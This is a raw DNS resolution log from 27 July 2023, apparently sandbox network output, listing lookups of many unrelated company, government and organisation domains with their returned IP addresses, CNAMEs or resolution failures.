                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:54.904989958 CEST8.8.8.8192.168.2.40x5565No error (0)fdlymca.org192.124.249.9A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:54.906114101 CEST8.8.8.8192.168.2.40x76dfNo error (0)fifa-ews.com104.21.10.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:54.906114101 CEST8.8.8.8192.168.2.40x76dfNo error (0)fifa-ews.com172.67.189.227A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:54.956552982 CEST8.8.8.8192.168.2.40x5e0aNo error (0)kamptal.at128.204.134.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:54.961901903 CEST8.8.8.8192.168.2.40x1ddfNo error (0)www.diamir.de94.130.146.206A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:55.022871017 CEST8.8.8.8192.168.2.40xf3dbNo error (0)t-mould.com81.169.145.175A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:55.027962923 CEST8.8.8.8192.168.2.40x683eNo error (0)ldh.la.gov75.2.95.235A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:55.042131901 CEST8.8.8.8192.168.2.40x5b5fNo error (0)ccssinc.com172.67.185.152A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:55.042131901 CEST8.8.8.8192.168.2.40x5b5fNo error (0)ccssinc.com104.21.19.68A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:55.095295906 CEST8.8.8.8192.168.2.40x6c6cNo error (0)nels.co.uk5.134.13.210A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:55.112170935 CEST8.8.8.8192.168.2.40x9fddNo error (0)snf.it95.174.22.233A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:55.143270969 CEST8.8.8.8192.168.2.40x9b50No error (0)a-domani.com183.90.232.24A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:55.229060888 CEST8.8.8.8192.168.2.40xd6e0No error (0)gbmfg.com151.101.2.132A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:55.229060888 CEST8.8.8.8192.168.2.40xd6e0No error (0)gbmfg.com151.101.66.132A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:55.229060888 CEST8.8.8.8192.168.2.40xd6e0No error (0)gbmfg.com151.101.130.132A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:55.229060888 CEST8.8.8.8192.168.2.40xd6e0No error (0)gbmfg.com151.101.194.132A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:55.246624947 CEST8.8.8.8192.168.2.40x4adbNo error (0)shiner.com188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:55.246624947 CEST8.8.8.8192.168.2.40x4adbNo error (0)shiner.com188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:55.324573040 CEST8.8.8.8192.168.2.40xa2b3No error (0)kavram.com172.67.189.68A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:55.324573040 CEST8.8.8.8192.168.2.40xa2b3No error (0)kavram.com104.21.89.126A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:55.332210064 CEST8.8.8.8192.168.2.40xb281No error (0)kamptal.at128.204.134.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:55.338556051 CEST8.8.8.8192.168.2.40x2163No error (0)burstner.ru62.122.170.171A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:55.451332092 CEST8.8.8.8192.168.2.40xa5abNo error (0)yasuma.com61.200.81.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:55.459377050 CEST8.8.8.8192.168.2.40xbe60No error (0)t-trust.jp183.181.82.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:55.522110939 CEST8.8.8.8192.168.2.40x515dNo error (0)absblast.com141.193.213.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:55.563961029 CEST8.8.8.8192.168.2.40xb79No error (0)x96.com188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:55.563961029 CEST8.8.8.8192.168.2.40xb79No error (0)x96.com188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:55.577483892 CEST8.8.8.8192.168.2.40xc001No error (0)fdlymca.org192.124.249.9A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:55.646919012 CEST8.8.8.8192.168.2.40x3ccaNo error (0)btsi.com.ph69.46.30.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:55.681189060 CEST8.8.8.8192.168.2.40xa54cNo error (0)orbitgas.com107.180.58.31A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:55.707214117 CEST8.8.8.8192.168.2.40x51c7Server failure (2)someikan.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:55.752795935 CEST8.8.8.8192.168.2.40x5098No error (0)rast.se93.188.2.51A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:55.815494061 CEST8.8.8.8192.168.2.40x7dbdNo error (0)paraski.org94.130.164.242A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:55.815958977 CEST8.8.8.8192.168.2.40x9fabNo error (0)hazmatt.com205.178.189.131A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:55.902669907 CEST8.8.8.8192.168.2.40x1288No error (0)nolaoig.org54.212.145.129A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:55.939301968 CEST8.8.8.8192.168.2.40xacccServer failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:55.961128950 CEST8.8.8.8192.168.2.40x66a3No error (0)www.pb-games.compb-games.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:55.961128950 CEST8.8.8.8192.168.2.40x66a3No error (0)pb-games.com173.254.28.29A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:55.987453938 CEST8.8.8.8192.168.2.40xae50No error (0)touchfam.ca15.197.142.173A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:55.987453938 CEST8.8.8.8192.168.2.40xae50No error (0)touchfam.ca3.33.152.147A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:56.000432014 CEST8.8.8.8192.168.2.40xe796No error (0)oozkranj.com212.44.102.57A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:56.010364056 CEST8.8.8.8192.168.2.40x72c0No error (0)uster.com172.67.32.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:56.010364056 CEST8.8.8.8192.168.2.40x72c0No error (0)uster.com104.20.221.29A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:56.010364056 CEST8.8.8.8192.168.2.40x72c0No error (0)uster.com104.20.220.29A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:56.020324945 CEST8.8.8.8192.168.2.40xcdd4No error (0)pertex.com185.151.30.147A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:56.021485090 CEST8.8.8.8192.168.2.40xf62fNo error (0)jsaps.com49.212.235.59A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:56.032799959 CEST8.8.8.8192.168.2.40xe756No error (0)kayoaiba.com154.213.117.166A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:56.037200928 CEST8.8.8.8192.168.2.40x6fbcNo error (0)bosado.com5.39.75.157A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:56.057152033 CEST8.8.8.8192.168.2.40x31d7No error (0)agulatex.com133.125.38.187A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:56.221219063 CEST8.8.8.8192.168.2.40x9570No error (0)stopllc.com162.241.233.114A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:56.349416971 CEST8.8.8.8192.168.2.40x29e8No error (0)hes.pt52.19.230.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:56.378390074 CEST8.8.8.8192.168.2.40xd1c5No error (0)ifesnet.com188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:56.378390074 CEST8.8.8.8192.168.2.40xd1c5No error (0)ifesnet.com188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:56.402229071 CEST8.8.8.8192.168.2.40xfafaNo error (0)akr.co.id104.20.123.68A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:56.402229071 CEST8.8.8.8192.168.2.40xfafaNo error (0)akr.co.id104.20.122.68A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:56.402229071 CEST8.8.8.8192.168.2.40xfafaNo error (0)akr.co.id172.67.33.252A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:56.425427914 CEST8.8.8.8192.168.2.40xc1fNo error (0)bigzz.by178.249.70.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:56.599359035 CEST8.8.8.8192.168.2.40xfcbcNo error (0)tozzhin.com202.94.166.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:56.605382919 CEST8.8.8.8192.168.2.40xdf49No error (0)gmail-smtp-in.l.google.com142.250.27.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:56.606460094 CEST8.8.8.8192.168.2.40xc5cServer failure (2)canmore.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:56.612401009 CEST8.8.8.8192.168.2.40x6c14No error (0)rast.se93.188.2.51A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:56.625262976 CEST8.8.8.8192.168.2.40x72a0No error (0)kursavto.ru31.177.76.70A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:56.625262976 CEST8.8.8.8192.168.2.40x72a0No error (0)kursavto.ru31.177.80.70A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:56.625535011 CEST8.8.8.8192.168.2.40xf742No error (0)vvsteknik.dk185.31.76.90A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:56.656408072 CEST8.8.8.8192.168.2.40xf5b5Server failure (2)canmore.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:56.723887920 CEST8.8.8.8192.168.2.40xb40bServer failure (2)zupraha.cznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:56.766448975 CEST8.8.8.8192.168.2.40x2b7cNo error (0)shittas.com208.91.197.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:56.768356085 CEST8.8.8.8192.168.2.40xe885Server failure (2)canmore.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:56.807101011 CEST8.8.8.8192.168.2.40xd514No error (0)kursavto.ru31.177.76.70A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:56.807101011 CEST8.8.8.8192.168.2.40xd514No error (0)kursavto.ru31.177.80.70A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:56.848404884 CEST8.8.8.8192.168.2.40xdec1No error (0)vonparis.com23.185.0.4A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:56.851321936 CEST8.8.8.8192.168.2.40xe581No error (0)agulatex.com133.125.38.187A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:56.945880890 CEST8.8.8.8192.168.2.40xd6abNo error (0)mijash3.com198.185.159.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:56.945880890 CEST8.8.8.8192.168.2.40xd6abNo error (0)mijash3.com198.185.159.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:56.945880890 CEST8.8.8.8192.168.2.40xd6abNo error (0)mijash3.com198.49.23.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:56.945880890 CEST8.8.8.8192.168.2.40xd6abNo error (0)mijash3.com198.49.23.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:57.001523972 CEST8.8.8.8192.168.2.40xacccServer failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:57.013336897 CEST8.8.8.8192.168.2.40xa66dNo error (0)forbin.net172.67.148.35A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:57.013336897 CEST8.8.8.8192.168.2.40xa66dNo error (0)forbin.net104.21.41.152A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:57.158806086 CEST8.8.8.8192.168.2.40x4e6bNo error (0)riwn.org198.185.159.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:57.158806086 CEST8.8.8.8192.168.2.40x4e6bNo error (0)riwn.org198.49.23.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:57.158806086 CEST8.8.8.8192.168.2.40x4e6bNo error (0)riwn.org198.185.159.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:57.158806086 CEST8.8.8.8192.168.2.40x4e6bNo error (0)riwn.org198.49.23.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:57.215403080 CEST8.8.8.8192.168.2.40xd28No error (0)fifa-ews.com104.21.10.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:57.215403080 CEST8.8.8.8192.168.2.40xd28No error (0)fifa-ews.com172.67.189.227A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:57.229737043 CEST8.8.8.8192.168.2.40xfaeaNo error (0)fdlymca.org192.124.249.9A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:57.299431086 CEST8.8.8.8192.168.2.40xee33No error (0)scip.org.uk172.67.72.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:57.299431086 CEST8.8.8.8192.168.2.40xee33No error (0)scip.org.uk104.26.13.244A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:57.299431086 CEST8.8.8.8192.168.2.40xee33No error (0)scip.org.uk104.26.12.244A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:57.307311058 CEST8.8.8.8192.168.2.40x9219No error (0)dspears.comtraff-1.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:57.307311058 CEST8.8.8.8192.168.2.40x9219No error (0)traff-1.hugedomains.comhdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:57.307311058 CEST8.8.8.8192.168.2.40x9219No error (0)hdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.com54.209.32.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:57.307311058 CEST8.8.8.8192.168.2.40x9219No error (0)hdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.com52.71.57.184A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:57.322977066 CEST8.8.8.8192.168.2.40x746Server failure (2)awfraser.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:57.368786097 CEST8.8.8.8192.168.2.40xa8e3No error (0)popbook.com47.91.167.60A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:57.463670015 CEST8.8.8.8192.168.2.40x746Server failure (2)awfraser.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:57.481400013 CEST8.8.8.8192.168.2.40x4a3aNo error (0)www.sclover3.com157.112.182.239A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:57.499284029 CEST8.8.8.8192.168.2.40x8614Server failure (2)atis-sk.canonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:57.559618950 CEST8.8.8.8192.168.2.40xbd7fNo error (0)www.synetik.netsynetik.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:57.559618950 CEST8.8.8.8192.168.2.40xbd7fNo error (0)synetik.net193.166.255.171A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:57.583220005 CEST8.8.8.8192.168.2.40x755aServer failure (2)atis-sk.canonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:57.598345995 CEST8.8.8.8192.168.2.40xf4a5No error (0)notis.ru185.178.208.141A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:57.659149885 CEST8.8.8.8192.168.2.40x3fcaName error (3)www.jroy.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:57.720242023 CEST8.8.8.8192.168.2.40xbadbNo error (0)pleszew.policja.gov.pl91.229.22.126A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:57.770298004 CEST8.8.8.8192.168.2.40xbf14No error (0)wvs-net.de188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:57.770298004 CEST8.8.8.8192.168.2.40xbf14No error (0)wvs-net.de188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:57.786439896 CEST8.8.8.8192.168.2.40x2fd7No error (0)hyab.com172.67.193.133A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:57.786439896 CEST8.8.8.8192.168.2.40x2fd7No error (0)hyab.com104.21.65.224A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:57.790235043 CEST8.8.8.8192.168.2.40xa4f0Server failure (2)atis-sk.canonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:57.799374104 CEST8.8.8.8192.168.2.40x72a9No error (0)wolffkran.de46.4.56.54A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:57.814615011 CEST8.8.8.8192.168.2.40xb11No error (0)nts-web.net49.212.235.175A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:57.840698004 CEST8.8.8.8192.168.2.40x1221Server failure (2)atis-sk.canonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:57.895291090 CEST8.8.8.8192.168.2.40x6758No error (0)yasuma.com61.200.81.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:57.919703007 CEST8.8.8.8192.168.2.40x1ec3Server failure (2)atis-sk.canonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:57.937921047 CEST8.8.8.8192.168.2.40x9be9Server failure (2)atis-sk.canonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:57.947388887 CEST8.8.8.8192.168.2.40x8a5dNo error (0)cubodown.com104.21.30.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:57.947388887 CEST8.8.8.8192.168.2.40x8a5dNo error (0)cubodown.com172.67.150.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:57.964510918 CEST8.8.8.8192.168.2.40x314bServer failure (2)atis-sk.canonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:58.072231054 CEST8.8.8.8192.168.2.40xf448No error (0)ftchat.com188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:58.072231054 CEST8.8.8.8192.168.2.40xf448No error (0)ftchat.com188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:58.112358093 CEST8.8.8.8192.168.2.40xfd26No error (0)jsaps.com49.212.235.59A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:58.131901979 CEST8.8.8.8192.168.2.40x4c42No error (0)xult.org65.52.128.33A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:58.189090014 CEST8.8.8.8192.168.2.40x7589No error (0)zugseil.com92.42.191.40A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:58.207546949 CEST8.8.8.8192.168.2.40x78b7No error (0)ccssinc.com172.67.185.152A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:58.207546949 CEST8.8.8.8192.168.2.40x78b7No error (0)ccssinc.com104.21.19.68A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:58.221617937 CEST8.8.8.8192.168.2.40x5b48No error (0)shztm.ru62.122.170.171A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:58.331248045 CEST8.8.8.8192.168.2.40x8a10No error (0)onzcda.com35.186.238.101A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:58.347131968 CEST8.8.8.8192.168.2.40x409dNo error (0)listel.co.jp49.212.243.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:58.404423952 CEST8.8.8.8192.168.2.40xa18aNo error (0)enguita.net195.5.116.23A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:58.442651033 CEST8.8.8.8192.168.2.40x746Server failure (2)awfraser.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:58.490410089 CEST8.8.8.8192.168.2.40xfc22No error (0)aba.org.eg192.169.149.78A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:58.530678988 CEST8.8.8.8192.168.2.40x26e3No error (0)burstner.ru62.122.170.171A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:58.533193111 CEST8.8.8.8192.168.2.40x8da9No error (0)revoldia.net154.201.225.123A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:58.545159101 CEST8.8.8.8192.168.2.40xf110No error (0)indonesiamedia.com74.208.215.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:58.594023943 CEST8.8.8.8192.168.2.40xa665No error (0)sinwal.com188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:58.594023943 CEST8.8.8.8192.168.2.40xa665No error (0)sinwal.com188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:58.597994089 CEST8.8.8.8192.168.2.40x8d1fNo error (0)clinicasanluis.com.co104.21.66.220A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:58.597994089 CEST8.8.8.8192.168.2.40x8d1fNo error (0)clinicasanluis.com.co172.67.164.178A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:58.631441116 CEST8.8.8.8192.168.2.40x82e3No error (0)dataform.co.uk83.223.113.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:58.681690931 CEST8.8.8.8192.168.2.40x5256No error (0)bidroll.com13.56.33.8A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:58.697087049 CEST8.8.8.8192.168.2.40x6edeNo error (0)vvsteknik.dk185.31.76.90A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:58.723238945 CEST8.8.8.8192.168.2.40x612dNo error (0)simetar.com104.21.79.166A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:58.723238945 CEST8.8.8.8192.168.2.40x612dNo error (0)simetar.com172.67.146.154A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:58.729967117 CEST8.8.8.8192.168.2.40x45b4No error (0)ncn.de46.30.60.158A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:58.754933119 CEST8.8.8.8192.168.2.40xd598No error (0)aiolos-sa.gr188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:58.754933119 CEST8.8.8.8192.168.2.40xd598No error (0)aiolos-sa.gr188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:58.855525017 CEST8.8.8.8192.168.2.40x95d5No error (0)zugseil.com92.42.191.40A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:59.029259920 CEST8.8.8.8192.168.2.40xacccServer failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:59.096010923 CEST8.8.8.8192.168.2.40xcae6No error (0)jnf.at136.243.147.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:59.108475924 CEST8.8.8.8192.168.2.40x7d18No error (0)bible.org104.20.55.214A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:59.108475924 CEST8.8.8.8192.168.2.40x7d18No error (0)bible.org104.20.54.214A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:59.108475924 CEST8.8.8.8192.168.2.40x7d18No error (0)bible.org172.67.33.95A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:59.108789921 CEST8.8.8.8192.168.2.40xb753No error (0)lpver.com92.204.129.113A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:59.115719080 CEST8.8.8.8192.168.2.40x47b2No error (0)themark.org35.172.94.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:59.115719080 CEST8.8.8.8192.168.2.40x47b2No error (0)themark.org100.24.208.97A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:59.160072088 CEST8.8.8.8192.168.2.40x3d3fServer failure (2)someikan.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:59.285530090 CEST8.8.8.8192.168.2.40xdd94No error (0)isom.org192.124.249.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:59.435527086 CEST8.8.8.8192.168.2.40xfeecNo error (0)hchc.org34.224.10.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:59.435527086 CEST8.8.8.8192.168.2.40xfeecNo error (0)hchc.org52.11.37.152A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:59.505975008 CEST8.8.8.8192.168.2.40xa826Server failure (2)awfraser.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:59.530356884 CEST8.8.8.8192.168.2.40x6bdcNo error (0)wantapc.net157.7.107.49A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:59.566514969 CEST8.8.8.8192.168.2.40xb39aName error (3)workplus.hunonenoneA (IP address)IN (0x0001)false
